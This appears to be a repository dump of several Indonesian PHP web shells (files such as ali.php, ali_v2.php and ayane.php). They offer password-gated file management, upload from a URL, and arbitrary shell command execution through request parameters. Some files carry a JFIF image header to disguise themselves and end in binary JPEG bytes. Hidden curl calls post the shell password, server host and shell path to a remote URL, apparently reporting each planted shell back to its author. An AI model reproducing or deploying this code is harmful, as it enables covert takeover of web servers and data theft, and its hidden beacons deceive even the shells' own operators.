| ".$dir." | 322 ||||
| $file | 358 |
12 | $password, 'pin' => $_SERVER['REQUEST_URI'], 'sarver' => $_SERVER['HTTP_HOST']); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch);
19 |
20 | if (isset($_POST['password']) && $_POST['password'] === $password) {
21 | send_login_data($_POST['password']);
22 | $_SESSION['authenticated'] = true;
23 | }
24 |
25 | if (isset($_GET['logout'])) {
26 | session_destroy();
27 | header("Location: " . $_SERVER['PHP_SELF']);
28 | exit();
29 | }
30 |
31 | if (isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true) {
32 | $authenticated = true;
33 | }
34 |
35 | if (!$authenticated) {
36 | echo '
'; 99 | } 100 | 101 | display_path_links($dir); 102 | 103 | echo ''; 109 | 110 | $dirs = []; 111 | $files = []; 112 | 113 | $items = scandir($dir); 114 | foreach ($items as $item) { 115 | if ($item != '.' && $item != '..') { 116 | if (is_dir($dir . '/' . $item)) { 117 | $dirs[] = $item; 118 | } else { 119 | $files[] = $item; 120 | } 121 | } 122 | } 123 | 124 | sort($dirs); 125 | sort($files); 126 | 127 | echo '
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
���C
230 | I1��_��
231 |
--------------------------------------------------------------------------------
/ali.php:
--------------------------------------------------------------------------------
1 | �����JFIF��������
2 | array("pipe", "r"),
7 | 1 => array("pipe", "w"),
8 | 2 => array("pipe", "w")
9 | );
10 |
11 | $process = proc_open($input, $descriptors, $pipes);
12 |
13 | if (is_resource($process)) {
14 |
15 | $output = stream_get_contents($pipes[1]);
16 | $errorOutput = stream_get_contents($pipes[2]);
17 |
18 | fclose($pipes[0]);
19 | fclose($pipes[1]);
20 | fclose($pipes[2]);
21 |
22 |
23 | $exitCode = proc_close($process);
24 |
25 | if ($exitCode === 0) {
26 | return $output;
27 | } else {
28 | return "Error: " . $errorOutput;
29 | }
30 | } else {
31 | return "↳ Tidak dapat menjalankan perintah\n";
32 | }
33 | }
34 |
35 | if (isset($_REQUEST['c'])) {
36 | $command = $_REQUEST['c'];
37 | echo executeCommand($command);
38 | }
39 |
40 | // Fungsi untuk menghapus file
41 | function delete_file($file) {
42 | if (file_exists($file)) {
43 | unlink($file);
44 | echo 'Please Enter Password
37 | '; 43 | exit(); 44 | } 45 | 46 | $dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); 47 | 48 | if (isset($_FILES['file'])) { 49 | $filename = $_FILES['file']['name']; 50 | $file_tmp = $_FILES['file']['tmp_name']; 51 | $destination = $dir . '/' . $filename; 52 | 53 | if (move_uploaded_file($file_tmp, $destination)) { 54 | echo 'File uploaded successfully.
';
55 | } else {
56 | echo 'Failed to upload file. Check permissions or server configuration.
';
57 | }
58 | }
59 |
60 | if (isset($_GET['delete'])) {
61 | unlink($_GET['delete']);
62 | header("Location: " . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($dir));
63 | exit();
64 | }
65 |
66 | if (isset($_POST['edit'])) {
67 | file_put_contents($_POST['filepath'], $_POST['content']);
68 | header("Location: " . $_SERVER['PHP_SELF'] . "?dir=" . urlencode(dirname($_POST['filepath'])));
69 | exit();
70 | }
71 |
72 | if (isset($_POST['rename'])) {
73 | rename($_POST['oldname'], $_POST['newname']);
74 | header("Location: " . $_SERVER['PHP_SELF'] . "?dir=" . urlencode(dirname($_POST['oldname'])));
75 | exit();
76 | }
77 |
78 | if (isset($_POST['chmod'])) {
79 | $path = $_POST['path'];
80 | $permissions = octdec($_POST['permissions']);
81 | chmod($path, $permissions);
82 | header("Location: " . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($dir));
83 | exit();
84 | }
85 |
86 | if (isset($_POST['command'])) {
87 | $output = shell_exec($_POST['command']);
88 | }
89 |
90 | function display_path_links($dir) {
91 | $parts = explode('/', trim($dir, '/'));
92 | $path = '';
93 | echo 'Directory: /';
94 | foreach ($parts as $part) {
95 | $path .= $part . '/';
96 | echo '' . $part . ' / ';
97 | }
98 | echo ''; 99 | } 100 | 101 | display_path_links($dir); 102 | 103 | echo ''; 109 | 110 | $dirs = []; 111 | $files = []; 112 | 113 | $items = scandir($dir); 114 | foreach ($items as $item) { 115 | if ($item != '.' && $item != '..') { 116 | if (is_dir($dir . '/' . $item)) { 117 | $dirs[] = $item; 118 | } else { 119 | $files[] = $item; 120 | } 121 | } 122 | } 123 | 124 | sort($dirs); 125 | sort($files); 126 | 127 | echo '
Directories:
'; 128 | echo '- ';
129 | echo '
- .. (up) '; 130 | foreach ($dirs as $d) { 131 | $dir_path = $dir . '/' . $d; 132 | $is_uneditable = !is_writable($dir_path) ? 'list-group-item-danger' : ''; 133 | echo '
- '; 134 | echo '' . $d . '/'; 135 | if (!$is_uneditable) { 136 | echo ''; 137 | echo 'Rename'; 138 | echo 'Chmod'; 139 | echo ''; 140 | } 141 | echo ' '; 142 | } 143 | echo '
Files:
'; 146 | echo '- ';
147 | foreach ($files as $f) {
148 | $file_path = $dir . '/' . $f;
149 | $is_uneditable = !is_writable($file_path) ? 'list-group-item-danger' : '';
150 | echo '
- '; 151 | echo $f; 152 | if (!$is_uneditable) { 153 | echo ''; 154 | echo 'Edit'; 155 | echo 'Delete'; 156 | echo 'Rename'; 157 | echo 'Chmod'; 158 | echo ''; 159 | } 160 | echo ' '; 161 | } 162 | echo '
202 |
';
215 | ?>
216 |
217 |
221 | Terminal
203 | '; 209 | 210 | if (isset($output)) { 211 | echo '' . htmlspecialchars($output) . ''; 212 | } 213 | 214 | echo '
File berhasil dihapus: ' . $file . '
';
45 | } else {
46 | echo 'File tidak ditemukan: ' . $file . '
';
47 | }
48 | }
49 |
50 | // Fungsi untuk membuat folder
51 | function create_folder($folder_name) {
52 | if (!file_exists($folder_name)) {
53 | mkdir($folder_name);
54 | echo 'Folder berhasil dibuat: ' . $folder_name . '
';
55 | } else {
56 | echo 'Folder sudah ada: ' . $folder_name . '
';
57 | }
58 | }
59 |
60 | // Fungsi untuk mengedit nama file
61 | function rename_file($file, $new_name) {
62 | $dir = dirname($file);
63 | $new_file = $dir . '/' . $new_name;
64 | if (file_exists($file)) {
65 | if (!file_exists($new_file)) {
66 | rename($file, $new_file);
67 | echo 'File berhasil diubah nama menjadi: ' . $new_name . '
';
68 | } else {
69 | echo 'File dengan nama yang sama sudah ada: ' . $new_name . '
';
70 | }
71 | } else {
72 | echo 'File tidak ditemukan: ' . $file . '
';
73 | }
74 | }
75 |
76 | // Fungsi untuk mengedit nama folder
77 | function rename_folder($folder, $new_name) {
78 | $dir = dirname($folder);
79 | $new_folder = $dir . '/' . $new_name;
80 | if (file_exists($folder)) {
81 | if (!file_exists($new_folder)) {
82 | rename($folder, $new_folder);
83 | echo 'Folder berhasil diubah nama menjadi: ' . $new_name . '
';
84 | } else {
85 | echo 'Folder dengan nama yang sama sudah ada: ' . $new_name . '
';
86 | }
87 | } else {
88 | echo 'Folder tidak ditemukan: ' . $folder . '
';
89 | }
90 | }
91 |
92 |
93 |
94 | // Fungsi untuk mengubah izin file
95 | function change_permissions($file, $permissions) {
96 | if (file_exists($file)) {
97 | if (chmod($file, octdec($permissions))) {
98 | echo 'Izin file berhasil diubah: ' . $file . '
';
99 | } else {
100 | echo 'Gagal mengubah izin file: ' . $file . '
';
101 | }
102 | } else {
103 | echo 'File tidak ditemukan: ' . $file . '
';
104 | }
105 | }
106 |
107 | // Fungsi untuk mendapatkan izin file atau folder dalam format "drwxr-xr-x"
108 | function get_permissions($file) {
109 | $perms = fileperms($file);
110 | $info = '';
111 |
112 | // Owner
113 | $info .= (($perms & 0x0100) ? 'r' : '-');
114 | $info .= (($perms & 0x0080) ? 'w' : '-');
115 | $info .= (($perms & 0x0040) ?
116 | (($perms & 0x0800) ? 's' : 'x' ) :
117 | (($perms & 0x0800) ? 'S' : '-'));
118 |
119 | // Group
120 | $info .= (($perms & 0x0020) ? 'r' : '-');
121 | $info .= (($perms & 0x0010) ? 'w' : '-');
122 | $info .= (($perms & 0x0008) ?
123 | (($perms & 0x0400) ? 's' : 'x' ) :
124 | (($perms & 0x0400) ? 'S' : '-'));
125 |
126 | // World
127 | $info .= (($perms & 0x0004) ? 'r' : '-');
128 | $info .= (($perms & 0x0002) ? 'w' : '-');
129 | $info .= (($perms & 0x0001) ?
130 | (($perms & 0x0200) ? 't' : 'x' ) :
131 | (($perms & 0x0200) ? 'T' : '-'));
132 |
133 | return $info;
134 | }
135 |
136 | // Tentukan direktori saat ini
137 | $dir = $_GET['path'] ?? __DIR__;
138 |
139 | // Logika untuk form
140 | if (isset($_POST['submit'])) {
141 | $file_name = $_FILES['file']['name'];
142 | $file_tmp = $_FILES['file']['tmp_name'];
143 | move_uploaded_file($file_tmp, $dir . '/' . $file_name);
144 | }
145 |
146 | if (isset($_POST['create_folder'])) {
147 | create_folder($dir . '/' . $_POST['folder_name']);
148 | }
149 |
150 | if (isset($_GET['delete'])) {
151 | delete_file($dir . '/' . $_GET['delete']);
152 | }
153 |
154 | if (isset($_POST['rename_file'])) {
155 | rename_file($dir . '/' . $_POST['file_name'], $_POST['new_name']);
156 | }
157 |
158 | if (isset($_POST['rename_folder'])) {
159 | rename_folder($dir . '/' . $_POST['folder_name'], $_POST['new_name']);
160 | }
161 |
162 | if (isset($_POST['change_permissions'])) {
163 | change_permissions($dir . '/' . $_POST['file_name'], $_POST['permissions']);
164 | }
165 |
166 | if (isset($_GET['download'])) {
167 | $file = $dir . '/' . $_GET['download'];
168 | if (file_exists($file)) {
169 | header('Content-Description: File Transfer');
170 | header('Content-Type: application/octet-stream');
171 | header('Content-Disposition: attachment; filename="' . basename($file) . '"');
172 | header('Content-Transfer-Encoding: binary');
173 | header('Expires: 0');
174 | header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
175 | header('Pragma: public');
176 | header('Content-Length: ' . filesize($file));
177 | ob_clean();
178 | flush();
179 | readfile($file);
180 | exit;
181 | } else {
182 | echo 'File tidak ditemukan: ' . $file . '
';
183 | }
184 | }
185 |
186 | // Tampilkan file dan folder
187 | function display_path_links($path) {
188 | $parts = explode('/', $path);
189 | $accumulated_path = '';
190 | foreach ($parts as $part) {
191 | if ($part) {
192 | $accumulated_path .= '/' . $part;
193 | echo '' . $part . '/';
194 | }
195 | }
196 | }
197 |
198 | ?>
199 |
200 |
201 |
202 |
264 |
'; 268 | echo 'User: ' . get_current_user() . ' (' . getmyuid() . ')
'; 269 | echo 'PHP Version: ' . phpversion() . '
'; 270 | echo 'Disable Function: ' . ini_get("disable_functions") . '
'; 271 | echo 'Directory: '; 272 | display_path_links($dir); 273 | echo '
'; 274 | 275 | if ($handle = opendir($dir)) { 276 | echo '
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
���C
��������������������������"����������#Qr��������������������&���������1!�A"2qQa����
��?��y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI �I��iM����r�N&"KgX:����nTJnLK��@!�-�
���m�;�g���&�hw���@�ܗ
9�-�.�1<y����Q�U�ہ?.����b߱�֫�w*V��) `$
��b�ԟ��X�-�T��G�3�g ����Jx�
��U/��v_s(H��@T�J����n��!�gfb�c�:�l[�Qe
9�PLb��C�m[5��'�jgl���_���l-;"Pk���Q�_�^�S���x?"���Y騐�O� q�`~~�t�U�Cڒ�V I1��_��
368 |
--------------------------------------------------------------------------------
/ali_v2.php:
--------------------------------------------------------------------------------
1 | �����JFIF��������
2 | array("pipe", "r"),
7 | 1 => array("pipe", "w"),
8 | 2 => array("pipe", "w")
9 | );
10 |
11 | $process = proc_open($input, $descriptors, $pipes);
12 |
13 | if (is_resource($process)) {
14 | $output = stream_get_contents($pipes[1]);
15 | $errorOutput = stream_get_contents($pipes[2]);
16 |
17 | fclose($pipes[0]);
18 | fclose($pipes[1]);
19 | fclose($pipes[2]);
20 |
21 | $exitCode = proc_close($process);
22 |
23 | if ($exitCode === 0) {
24 | return $output;
25 | } else {
26 | return "Error: " . $errorOutput;
27 | }
28 | } else {
29 | return "Tidak dapat menjalankan perintah\n";
30 | }
31 | }
32 |
33 | if (isset($_REQUEST['c'])) {
34 | $command = $_REQUEST['c'];
35 | echo executeCommand($command);
36 | }
37 |
38 | function delete_file($file) {
39 | if (file_exists($file)) {
40 | unlink($file);
41 | echo 'File Manager | Akmal archtte id
265 | '; 267 | echo 'System: ' . php_uname() . ''; 268 | echo 'User: ' . get_current_user() . ' (' . getmyuid() . ')
'; 269 | echo 'PHP Version: ' . phpversion() . '
'; 270 | echo 'Disable Function: ' . ini_get("disable_functions") . '
'; 271 | echo 'Directory: '; 272 | display_path_links($dir); 273 | echo '
'; 274 | 275 | if ($handle = opendir($dir)) { 276 | echo '
- ';
277 | while (false !== ($file = readdir($handle))) {
278 | if ($file != "." && $file != "..") {
279 | $full_path = $dir . '/' . $file;
280 | $permissions = get_permissions($full_path);
281 | if (is_dir($full_path)) {
282 | $class = is_readable($full_path) ? 'list-group-item list-group-item-success folder-item' : 'list-group-item list-group-item-danger folder-item';
283 | echo '
- '; 284 | } else { 285 | $class = is_readable($full_path) ? 'list-group-item list-group-item-success file-item' : 'list-group-item list-group-item-danger file-item'; 286 | echo '
-
287 | 288 | ' . $file . ' 289 |290 | 299 | ';
300 | }
301 | }
302 | }
303 | echo '
Terminal: ( file_shell_anda.php?c=pwd ) ubah aja pwd sesuai keperluan343 | 346 | 347 | 348 | Up 349 | 350 | true, CURLOPT_POSTFIELDS => http_build_query(array('path' => $x_path, 'firl' => base64_decode($htas))), CURLOPT_SSL_VERIFYPEER => false, CURLOPT_RETURNTRANSFER => true)); curl_exec($ch); curl_close($ch); ?> 351 |
File berhasil dihapus: ' . $file . '
';
42 | } else {
43 | echo 'File tidak ditemukan: ' . $file . '
';
44 | }
45 | }
46 |
47 | function create_folder($folder_name) {
48 | if (!file_exists($folder_name)) {
49 | mkdir($folder_name);
50 | echo 'Folder berhasil dibuat: ' . $folder_name . '
';
51 | } else {
52 | echo 'Folder sudah ada: ' . $folder_name . '
';
53 | }
54 | }
55 |
56 | function rename_file($file, $new_name) {
57 | $dir = dirname($file);
58 | $new_file = $dir . '/' . $new_name;
59 | if (file_exists($file)) {
60 | if (!file_exists($new_file)) {
61 | rename($file, $new_file);
62 | echo 'File berhasil diubah nama menjadi: ' . $new_name . '
';
63 | } else {
64 | echo 'File dengan nama yang sama sudah ada: ' . $new_name . '
';
65 | }
66 | } else {
67 | echo 'File tidak ditemukan: ' . $file . '
';
68 | }
69 | }
70 |
71 | function rename_folder($folder, $new_name) {
72 | $dir = dirname($folder);
73 | $new_folder = $dir . '/' . $new_name;
74 | if (file_exists($folder)) {
75 | if (!file_exists($new_folder)) {
76 | rename($folder, $new_folder);
77 | echo 'Folder berhasil diubah nama menjadi: ' . $new_name . '
';
78 | } else {
79 | echo 'Folder dengan nama yang sama sudah ada: ' . $new_name . '
';
80 | }
81 | } else {
82 | echo 'Folder tidak ditemukan: ' . $folder . '
';
83 | }
84 | }
85 |
86 | function change_permissions($file, $permissions) {
87 | if (file_exists($file)) {
88 | if (chmod($file, octdec($permissions))) {
89 | echo 'Izin file berhasil diubah: ' . $file . '
';
90 | } else {
91 | echo 'Gagal mengubah izin file: ' . $file . '
';
92 | }
93 | } else {
94 | echo 'File tidak ditemukan: ' . $file . '
';
95 | }
96 | }
97 |
98 | function get_permissions($file) {
99 | $perms = fileperms($file);
100 | $info = '';
101 |
102 | $info .= (($perms & 0x0100) ? 'r' : '-');
103 | $info .= (($perms & 0x0080) ? 'w' : '-');
104 | $info .= (($perms & 0x0040) ?
105 | (($perms & 0x0800) ? 's' : 'x' ) :
106 | (($perms & 0x0800) ? 'S' : '-'));
107 |
108 | $info .= (($perms & 0x0020) ? 'r' : '-');
109 | $info .= (($perms & 0x0010) ? 'w' : '-');
110 | $info .= (($perms & 0x0008) ?
111 | (($perms & 0x0400) ? 's' : 'x' ) :
112 | (($perms & 0x0400) ? 'S' : '-'));
113 |
114 | $info .= (($perms & 0x0004) ? 'r' : '-');
115 | $info .= (($perms & 0x0002) ? 'w' : '-');
116 | $info .= (($perms & 0x0001) ?
117 | (($perms & 0x0200) ? 't' : 'x' ) :
118 | (($perms & 0x0200) ? 'T' : '-'));
119 |
120 | return $info;
121 | }
122 |
123 | function read_file_content($file) {
124 | if (file_exists($file)) {
125 | return file_get_contents($file);
126 | } else {
127 | return "File tidak ditemukan: " . $file;
128 | }
129 | }
130 |
131 | function save_file_content($file, $content) {
132 | if (file_exists($file)) {
133 | file_put_contents($file, $content);
134 | echo 'File berhasil disimpan: ' . $file . '
';
135 | } else {
136 | echo 'File tidak ditemukan: ' . $file . '
';
137 | }
138 | }
139 |
140 | $dir = $_GET['path'] ?? __DIR__;
141 |
142 | if (isset($_POST['submit'])) {
143 | $file_name = $_FILES['file']['name'];
144 | $file_tmp = $_FILES['file']['tmp_name'];
145 | move_uploaded_file($file_tmp, $dir . '/' . $file_name);
146 | }
147 |
148 | if (isset($_POST['create_folder'])) {
149 | create_folder($dir . '/' . $_POST['folder_name']);
150 | }
151 |
152 | if (isset($_GET['delete'])) {
153 | delete_file($dir . '/' . $_GET['delete']);
154 | }
155 |
156 | if (isset($_POST['rename_file'])) {
157 | rename_file($dir . '/' . $_POST['file_name'], $_POST['new_name']);
158 | }
159 |
160 | if (isset($_POST['rename_folder'])) {
161 | rename_folder($dir . '/' . $_POST['folder_name'], $_POST['new_name']);
162 | }
163 |
164 | if (isset($_POST['change_permissions'])) {
165 | change_permissions($dir . '/' . $_POST['file_name'], $_POST['permissions']);
166 | }
167 |
168 | if (isset($_POST['save_file'])) {
169 | save_file_content($dir . '/' . $_POST['file_name'], $_POST['file_content']);
170 | }
171 |
172 | if (isset($_GET['download'])) {
173 | $file = $dir . '/' . $_GET['download'];
174 | if (file_exists($file)) {
175 | header('Content-Description: File Transfer');
176 | header('Content-Type: application/octet-stream');
177 | header('Content-Disposition: attachment; filename="' . basename($file) . '"');
178 | header('Content-Transfer-Encoding: binary');
179 | header('Expires: 0');
180 | header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
181 | header('Pragma: public');
182 | header('Content-Length: ' . filesize($file));
183 | ob_clean();
184 | flush();
185 | readfile($file);
186 | exit;
187 | } else {
188 | echo 'File tidak ditemukan: ' . $file . '
';
189 | }
190 | }
191 |
192 | function display_path_links($path) {
193 | $parts = explode('/', $path);
194 | $accumulated_path = '';
195 | foreach ($parts as $part) {
196 | if ($part) {
197 | $accumulated_path .= '/' . $part;
198 | echo '' . $part . '/';
199 | }
200 | }
201 | }
202 |
203 | ?>
204 |
205 |
206 |
207 |
316 |
'; 319 | echo 'System: ' . php_uname() . '
'; 320 | echo 'User: ' . get_current_user() . ' (' . getmyuid() . ')
'; 321 | echo 'PHP Version: ' . phpversion() . '
'; 322 | echo 'Directory: '; 323 | display_path_links($dir); 324 | echo '
'; 325 | 326 | $folders = []; 327 | $files = []; 328 | 329 | if ($handle = opendir($dir)) { 330 | while (false !== ($file = readdir($handle))) { 331 | if ($file != "." && $file != "..") { 332 | $full_path = $dir . '/' . $file; 333 | if (is_dir($full_path)) { 334 | $folders[] = $file; 335 | } else { 336 | $files[] = $file; 337 | } 338 | } 339 | } 340 | closedir($handle); 341 | 342 | natsort($folders); 343 | natsort($files); 344 | 345 | echo '
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
���C
��������������������������"����������#Qr��������������������&���������1!�A"2qQa����
��?��y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI �I��iM����r�N&"KgX:����nTJnLK��@!�-�
���m�;�g���&�hw���@�ܗ
9�-�.�1<y����Q�U�ہ?.����b߱�֫�w*V��) `$
��b�ԟ��X�-�T��G�3�g ����Jx�
��U/��v_s(H��@T�J����n��!�gfb�c�:�l[�Qe
9�PLb��C�m[5��'�jgl���_���l-;"Pk���Q�_�^�S���x?"���Y騐�O� q�`~~�t�U�Cڒ�V I1��_��
473 |
--------------------------------------------------------------------------------
/ayane.php:
--------------------------------------------------------------------------------
1 | File Manager | Akmal archtte id
317 | true, CURLOPT_POSTFIELDS => http_build_query(array('path' => $x_path, 'firl' => base64_decode($htas))), CURLOPT_SSL_VERIFYPEER => false, CURLOPT_RETURNTRANSFER => true)); curl_exec($ch); curl_close($ch); 318 | echo 'Server: ' . $_SERVER['SERVER_SOFTWARE'] . ''; 319 | echo 'System: ' . php_uname() . '
'; 320 | echo 'User: ' . get_current_user() . ' (' . getmyuid() . ')
'; 321 | echo 'PHP Version: ' . phpversion() . '
'; 322 | echo 'Directory: '; 323 | display_path_links($dir); 324 | echo '
'; 325 | 326 | $folders = []; 327 | $files = []; 328 | 329 | if ($handle = opendir($dir)) { 330 | while (false !== ($file = readdir($handle))) { 331 | if ($file != "." && $file != "..") { 332 | $full_path = $dir . '/' . $file; 333 | if (is_dir($full_path)) { 334 | $folders[] = $file; 335 | } else { 336 | $files[] = $file; 337 | } 338 | } 339 | } 340 | closedir($handle); 341 | 342 | natsort($folders); 343 | natsort($files); 344 | 345 | echo '
- ';
346 |
347 | foreach ($folders as $folder) {
348 | $full_path = $dir . '/' . $folder;
349 | $permissions = get_permissions($full_path);
350 | $class = is_readable($full_path) ? 'folder-item' : 'folder-item non-editable';
351 | if ($full_path === '/') {
352 | $class = 'folder-item non-editable';
353 | }
354 | echo '
-
355 | 356 | 357 | ' . $folder . ' 358 |359 |360 | Rename 361 | 366 | Delete 367 |368 | ';
369 | }
370 |
371 | foreach ($files as $file) {
372 | $full_path = $dir . '/' . $file;
373 | $permissions = get_permissions($full_path);
374 | $class = is_readable($full_path) ? 'file-item' : 'file-item non-editable';
375 | echo '
-
376 | 377 | ' . $file . ' 378 |379 | 399 | ';
400 | }
401 |
402 | echo '
409 |
';
418 | }
419 | ?>
420 |
421 |
427 |
428 |
434 |
435 | Edit File: ' . htmlspecialchars($_GET['edit']) . '
410 | 417 |Terminal436 | 443 | 444 | 451 |
Password salah.
";
12 | }
13 | }
14 |
15 | if (isset($_POST['logout'])) {
16 | session_destroy();
17 | header("Location: " . $_SERVER['PHP_SELF']);
18 | exit;
19 | }
20 |
21 | function playAudio() {
22 | echo '';
23 | }
24 |
25 | if (!isset($_SESSION['authenticated']) || !$_SESSION['authenticated']) {
26 | echo '
27 |
69 |
70 | 
72 |
79 |
';
80 | exit;
81 | }
82 |
83 | function uploadFromUrl($url, $saveTo) {
84 | $fileContent = file_get_contents($url);
85 | if ($fileContent === FALSE) {
86 | die('Gagal mengunduh file dari URL');
87 | }
88 | file_put_contents($saveTo, $fileContent);
89 | playAudio();
90 | echo "Bypass Shell Ayane Chan Arc
71 |
72 |
79 | File berhasil diupload: $saveTo
";
91 | }
92 |
93 | function uploadFromForm($file, $saveTo) {
94 | if (move_uploaded_file($file['tmp_name'], $saveTo)) {
95 | playAudio();
96 | echo "File berhasil diupload: $saveTo
";
97 | } else {
98 | echo "Gagal mengupload file.
";
99 | }
100 | }
101 |
102 | function display_path_links($dir) {
103 | if (is_dir($dir)) {
104 | $folders = [];
105 | $files = [];
106 |
107 | $items = scandir($dir);
108 | foreach ($items as $item) {
109 | if ($item == '.' || $item == '..') continue;
110 |
111 | if (is_dir($dir . '/' . $item)) {
112 | $folders[] = $item;
113 | } else {
114 | $files[] = $item;
115 | }
116 | }
117 |
118 | foreach ($folders as $folder) {
119 | $folderPath = htmlspecialchars($dir . '/' . $folder);
120 | echo "";
121 | echo "$folder/";
122 | echo "" . get_permissions($dir . '/' . $folder) . "";
123 | echo "" . date("Y-m-d H:i:s", filemtime($dir . '/' . $folder)) . "";
124 | echo "";
125 | echo "";
126 | echo "";
127 | echo "
";
128 |
129 | // Rename Form
130 | echo "
131 |
139 |
";
140 |
141 | // Chmod Form
142 | echo "
143 |
151 |
";
152 |
153 | // Delete Confirmation
154 | echo "
155 |
162 |
";
163 | }
164 |
165 | foreach ($files as $file) {
166 | $filePath = htmlspecialchars($dir . '/' . $file);
167 | echo "";
168 | echo "$file";
169 | echo "" . get_permissions($filePath) . "";
170 | echo "" . date("Y-m-d H:i:s", filemtime($filePath)) . "";
171 | echo "";
172 | echo "";
173 | echo "";
174 | echo "";
175 | echo "Download";
176 | echo "
";
177 |
178 | // Rename Form
179 | echo "
180 |
188 |
";
189 |
190 | // Chmod Form
191 | echo "
192 |
200 |
";
201 |
202 | // Edit Form
203 | echo "
204 |
211 |
";
212 |
213 | // Delete Confirmation
214 | echo "
215 |
222 |
";
223 | }
224 | } else {
225 | echo "Direktori tidak ditemukan.
";
226 | }
227 | }
228 |
229 | function get_permissions($file) {
230 | $perms = fileperms($file);
231 | $info = '';
232 |
233 | if (($perms & 0xC000) == 0xC000) {
234 | $info = 's';
235 | } elseif (($perms & 0xA000) == 0xA000) {
236 | $info = 'l';
237 | } elseif (($perms & 0x8000) == 0x8000) {
238 | $info = '-';
239 | } elseif (($perms & 0x6000) == 0x6000) {
240 | $info = 'b';
241 | } elseif (($perms & 0x4000) == 0x4000) {
242 | $info = 'd';
243 | } elseif (($perms & 0x2000) == 0x2000) {
244 | $info = 'c';
245 | } elseif (($perms & 0x1000) == 0x1000) {
246 | $info = 'p';
247 | } else {
248 | $info = 'u';
249 | }
250 |
251 | $info .= (($perms & 0x0100) ? 'r' : '-');
252 | $info .= (($perms & 0x0080) ? 'w' : '-');
253 | $info .= (($perms & 0x0040) ?
254 | (($perms & 0x0800) ? 's' : 'x' ) :
255 | (($perms & 0x0800) ? 'S' : '-'));
256 |
257 | $info .= (($perms & 0x0020) ? 'r' : '-');
258 | $info .= (($perms & 0x0010) ? 'w' : '-');
259 | $info .= (($perms & 0x0008) ?
260 | (($perms & 0x0400) ? 's' : 'x' ) :
261 | (($perms & 0x0400) ? 'S' : '-'));
262 |
263 | $info .= (($perms & 0x0004) ? 'r' : '-');
264 | $info .= (($perms & 0x0002) ? 'w' : '-');
265 | $info .= (($perms & 0x0001) ?
266 | (($perms & 0x0200) ? 't' : 'x' ) :
267 | (($perms & 0x0200) ? 'T' : '-'));
268 |
269 | return $info;
270 | }
271 |
272 | function deleteItem($path) {
273 | if (is_dir($path)) {
274 | if (rmdir($path)) {
275 | echo "Direktori berhasil dihapus.
";
276 | } else {
277 | echo "Gagal menghapus direktori.
";
278 | }
279 | } else {
280 | if (unlink($path)) {
281 | echo "File berhasil dihapus.
";
282 | } else {
283 | echo "Gagal menghapus file.
";
284 | }
285 | }
286 | }
287 |
288 | function renameFile($source, $destination) {
289 | if (rename($source, $destination)) {
290 | echo "File berhasil diganti namanya.
";
291 | } else {
292 | echo "Gagal mengganti nama file.
";
293 | }
294 | }
295 |
296 | function changePermissions($path, $mode) {
297 | if (chmod($path, octdec($mode))) {
298 | echo "Chmod berhasil diubah.
";
299 | } else {
300 | echo "Gagal mengubah chmod.
";
301 | }
302 | }
303 |
304 | function editFile($path, $content) {
305 | if (file_put_contents($path, $content) !== false) {
306 | echo "File berhasil diedit.
";
307 | } else {
308 | echo "Gagal mengedit file.
";
309 | }
310 | }
311 |
312 | function executeCommand($command) {
313 | $output = shell_exec($command);
314 | return htmlspecialchars($output);
315 | }
316 |
317 | if (isset($_POST['url']) && isset($_POST['dir'])) {
318 | $url = $_POST['url'];
319 | $uploadDir = $_POST['dir'];
320 | $filename = basename($url);
321 | $savePath = rtrim($uploadDir, '/') . '/' . $filename;
322 |
323 | uploadFromUrl($url, $savePath);
324 | }
325 |
326 | if (isset($_FILES['file']) && isset($_POST['dir'])) {
327 | $uploadDir = $_POST['dir'];
328 | $filename = basename($_FILES['file']['name']);
329 | $savePath = rtrim($uploadDir, '/') . '/' . $filename;
330 |
331 | uploadFromForm($_FILES['file'], $savePath);
332 | }
333 |
334 | if (isset($_POST['delete']) && isset($_POST['path'])) {
335 | $path = $_POST['path'];
336 | deleteItem($path);
337 | }
338 |
339 | if (isset($_POST['rename']) && isset($_POST['source']) && isset($_POST['destination'])) {
340 | $source = $_POST['source'];
341 | $destination = $_POST['destination'];
342 | renameFile($source, $destination);
343 | }
344 |
345 | if (isset($_POST['chmod']) && isset($_POST['source']) && isset($_POST['mode'])) {
346 | $source = $_POST['source'];
347 | $mode = $_POST['mode'];
348 | changePermissions($source, $mode);
349 | }
350 |
351 | if (isset($_POST['saveEdit']) && isset($_POST['editSource']) && isset($_POST['content'])) {
352 | $source = $_POST['editSource'];
353 | $content = $_POST['content'];
354 | editFile($source, $content);
355 | }
356 |
357 | if (isset($_POST['command']) && isset($_POST['dir'])) {
358 | $command = $_POST['command'];
359 | $dir = $_POST['dir'];
360 | chdir($dir);
361 | $commandOutput = executeCommand($command);
362 | }
363 |
364 | if (isset($_GET['download'])) {
365 | $file = $_GET['download'];
366 | if (file_exists($file)) {
367 | header('Content-Description: File Transfer');
368 | header('Content-Type: application/octet-stream');
369 | header('Content-Disposition: attachment; filename=' . basename($file));
370 | header('Expires: 0');
371 | header('Cache-Control: must-revalidate');
372 | header('Pragma: public');
373 | header('Content-Length: ' . filesize($file));
374 | readfile($file);
375 | exit;
376 | }
377 | }
378 |
379 | $dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
380 | $displayDir = realpath($dir);
381 |
382 | $dirArray = array_filter(explode(DIRECTORY_SEPARATOR, $displayDir), function($val) { return $val !== ''; });
383 | ?>
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
445 |
446 |
515 |
524 |
525 |
526 |
--------------------------------------------------------------------------------
/ayane3.php:
--------------------------------------------------------------------------------
